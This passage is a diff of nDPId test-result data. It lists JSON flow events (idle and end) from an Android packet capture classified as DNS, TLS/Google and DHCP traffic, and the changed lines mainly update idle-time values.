-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} 
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
@@ -337,44 +337,44 @@ 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":120000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
